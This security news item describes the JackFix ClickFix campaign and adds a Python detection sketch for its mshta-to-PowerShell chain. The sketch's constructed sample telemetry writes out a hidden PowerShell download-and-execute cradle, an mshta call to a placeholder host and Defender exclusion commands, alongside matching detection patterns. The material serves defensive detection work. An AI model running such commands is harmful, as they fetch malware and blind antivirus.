ClickFix Campaign Uses Fake Adult Sites for Malware

Cybersecurity researchers have identified a new ClickFix campaign, codenamed JackFix, that uses fake adult websites to trick users into running malicious commands disguised as Windows security updates. The campaign relies on malvertising to steer victims to the fake sites and on social engineering to get the command executed. Once a victim lands on one of the pages, a bogus security alert takes over the entire screen and instructs the victim to open the Windows Run dialog and execute a command, which starts the infection chain. The page is obfuscated and actively prevents the victim from escaping the full-screen alert.

The command entered in the Run dialog is an MSHTA payload: it invokes mshta.exe, which runs a PowerShell command that retrieves a second-stage script from a remote server. That script attempts to elevate privileges and adds Microsoft Defender Antivirus exclusions for the campaign's command-and-control addresses. It can then drop one or more payloads, including Rhadamanthys Stealer, Vidar Stealer 2.0, and RedLine Stealer. Each hop is observable on the endpoint: mshta.exe spawning powershell.exe from an interactive user session, and PowerShell adding Defender exclusions, are both uncommon in legitimate use and make good detection points.
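The chain described above (Run dialog, then mshta.exe, then a PowerShell download, then Defender exclusions) leaves a recognizable trail in process-creation telemetry and in the RunMRU registry key that Explorer uses to remember Run-dialog history. The following Python is an added detection sketch, not code from the researchers, the campaign, or this page: it runs a few rules over constructed Sysmon-style process events and a constructed RunMRU snapshot. The command lines, the file names and the 203.0.113.10 address (a documentation range) are invented placeholders; the real JackFix commands are not reproduced here.

```python
"""Added detection sketch for a JackFix-style chain: Run dialog -> mshta.exe ->
PowerShell download cradle -> Defender exclusions. All sample data is constructed."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 / Security 4688 fields)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# mshta given a URL or an inline script protocol instead of a local .hta file
MSHTA_REMOTE = re.compile(r"(?:https?://|javascript:|vbscript:)", re.I)
# common PowerShell download-and-execute cradles
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|Net\.WebClient",
    re.I)
# Add-MpPreference calls that add a Defender exclusion; captures the kind and the value
EXCLUSION = re.compile(
    r"Add-MpPreference\b[^;|]*?-Exclusion(Path|Process|Extension|IpAddress)\s+([^;|\"']+)", re.I)
SHELLS = {"powershell.exe", "pwsh.exe"}


def _basename(image: str) -> str:
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _ancestors(event, by_pid, limit=8):
    """Yield image basenames of parent, grandparent, ... (bounded against pid-reuse loops)."""
    cur = by_pid.get(event.ppid)
    while cur is not None and limit > 0:
        yield _basename(cur.image)
        cur = by_pid.get(cur.ppid)
        limit -= 1


def detect(events):
    """Return (rule, pid, detail) tuples for events that match the chain."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        name = _basename(e.image)
        if name == "mshta.exe" and MSHTA_REMOTE.search(e.cmdline):
            alerts.append(("mshta_remote_or_inline", e.pid, e.cmdline))
        if name in SHELLS:
            if "mshta.exe" in _ancestors(e, by_pid):
                alerts.append(("powershell_from_mshta", e.pid, f"ppid={e.ppid}"))
            if DOWNLOAD_CRADLE.search(e.cmdline):
                alerts.append(("powershell_download_cradle", e.pid, e.cmdline))
            for kind, value in EXCLUSION.findall(e.cmdline):
                alerts.append(("defender_exclusion_added", e.pid, f"{kind}={value.strip()}"))
    return alerts


RUN_LOLBINS = {"mshta", "mshta.exe", "powershell", "powershell.exe", "pwsh", "pwsh.exe",
               "cmd", "cmd.exe", "wscript", "wscript.exe", "cscript", "cscript.exe"}


def suspicious_runmru(values):
    """values mirrors HKCU\\...\\Explorer\\RunMRU: letter-named entries ending in '\\1'
    plus MRUList giving most-recent-first order. Returns flagged commands in that order."""
    hits = []
    for key in values.get("MRUList", ""):
        entry = values.get(key, "")
        if entry.endswith("\\1"):
            entry = entry[:-2]
        first = entry.split(" ", 1)[0].lower()
        if first in RUN_LOLBINS or MSHTA_REMOTE.search(entry) or DOWNLOAD_CRADLE.search(entry):
            hits.append(entry)
    return hits


# Constructed sample telemetry (not from the campaign); 203.0.113.10 is a documentation address.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(900, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1200, 900, r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://203.0.113.10/update.hta"),
    ProcEvent(1300, 1200, PS, r'''powershell.exe -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s.ps1')"'''),
    ProcEvent(1400, 1300, PS, r'powershell.exe -c "Add-MpPreference -ExclusionIpAddress 203.0.113.10; Add-MpPreference -ExclusionPath C:\Users\alice\AppData\Local\Temp"'),
    ProcEvent(2100, 900, PS, 'powershell.exe -c "Get-MpPreference"'),  # benign admin use
]
SAMPLE_RUNMRU = {"MRUList": "ba", "a": "notepad\\1",
                 "b": "mshta http://203.0.113.10/update.hta\\1"}

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
    print("RunMRU:", suspicious_runmru(SAMPLE_RUNMRU))
```

The ancestry walk matters more than a direct parent check: the exclusion-adding PowerShell in the sample is a grandchild of mshta.exe, and real chains add further hops. On a live host the RunMRU values come from `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` and the process events from Sysmon or 4688 auditing with command-line logging enabled; the rules above are a starting point to tune, not a finished signature.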

Latest mentioned: 11-25
Earliest mentioned: 11-24